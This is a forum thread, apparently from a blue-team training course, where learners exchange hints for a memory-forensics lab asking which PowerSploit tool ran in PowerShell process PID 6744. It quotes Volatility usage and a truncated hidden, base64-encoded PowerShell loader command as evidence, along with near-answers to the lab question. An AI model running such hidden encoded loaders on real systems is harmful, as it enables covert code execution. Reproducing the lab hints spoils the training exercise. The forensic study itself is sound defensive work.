Practical Digital Forensics Scenario

Hi guys,
I’m struggling with this one.

Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework) has been utilized within the process, and enter its name as your answer.

I noted that command was triggered with base64 encdoing, so the answer should be (I assume) copy and pasted from github link provided, but I’m not able to progress at all.

Any hints?

Encoded command needs can be decoded to reveal the answer. Its name of one of techniques available on the webpage, staring with P.

Am also stuck here. Any guide please

Try this way - It performs network enumeration and exploitation.

I found the answer, but I need to validate the answer. Can someone explain how we arrive to both answers for the questions in the section.

Hi. I found the solution but I just guessed it. I found the power shell with the base64 and when I decoded it, I finally find an executable code but nothing about the module used.

1 Like

That’s the problem with some of the modules, I didn’t liked it. I completed the entire blue team course, if got stuck feel free to reach me via PM.

hello. I need assistance kindly. I have been stuck here for days: (Practical Digital Forensics Scenario)
Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework) has been utilized within the process, and enter its name as your answer.

Please check all the answers provided in this thread, there’s many hints.

I just finished this a while ago,
First identify any PowerShell commands or scripts executed by the process with PID 6744 in a memory dump, you can use Volatility’s windows.cmdline

command -
python vol.py -f …\memdump\PhysicalMemory.raw windows.cmdline.CmdLine | findstr 6744

it will show you the result with something like this -

C:\Users\johndoe\Desktop\volatility3-develop>python vol.py -f …\memdump\PhysicalMemory.raw windows.cmdline.CmdLine | findstr 6744
6744 powershell.exe “PowerShell.exe” -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAVwBhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADIAZwBKAFUAQgBNAEcAYgBDAEQATgBHADcAWAAwAEQATQBiAHMAUwB5AEEAcwBkAGwANABVAGwAYwB1AEYASwBlAEsAMQBYAEEAYgBEAG0ALwBmAGYANQA1AGEAQgBkAEgAbwA2AFAAZABQAFMAegBFAFMASwBxAEgATABkADUAZABTADUAUwA5ADAANQA0AFgAZA

second - this is based 64, decode it using any tool like, powershell, cyberchef or burpsuite. me i ask chatgpt to decode it for me. then i ask gpt to explain it to,

third - look for the result in the github repo

I have reached out that the result is Out-EncodedCommand but don’t know why it’s not accepting it any other hints

1 Like

It’s simpler than this, just use the provided site with metasploit tools and try to find adequate tools name that „performs network enumeration and exploitation”.

This question isn’t ideal.

If any of you guys are banging your head on this one, it’s not asking for Invoke-Shellcode or other, its asking for the tool.

This is the most frustrating task i have ever done, it looks like its injecting shell code into a process
But its not the answer.

And to all my efforts i cant find any other good ways of solving this one.
I have reversed all det encoded parts, to no effect.
It still is just not clear, i feel the question is messing it up for me…

It sounds like your search for the tools was simple, but it has been complicated for me.

I tried listing all the tools from the README.md but none of them worked. Then I tried listing individual functions and modules but there are lots of them in each file so I tried lots but not all of them. Someone said the work Invoke was not in the name so I tried function names eliminating Invoke from them but to no luck.

How did you find this?

This one was tricky. I had to decode it from base64, and then there was a powershell script with another payload that furthermore was being decoded from base64 and uncompressed, per the code. I had to change the code to just save the uncompressed double decoded payload to a file instead of executing it, and then run the powershell script. Then the final payload was still not searchable in the github, but I tried searching other random parts of the code until I found something promising. The name of the tool corresponds to the name of one of the powershell files, but without the .ps1 extension.

The answer is just a tool name from provided website, the name was nested somewhere there.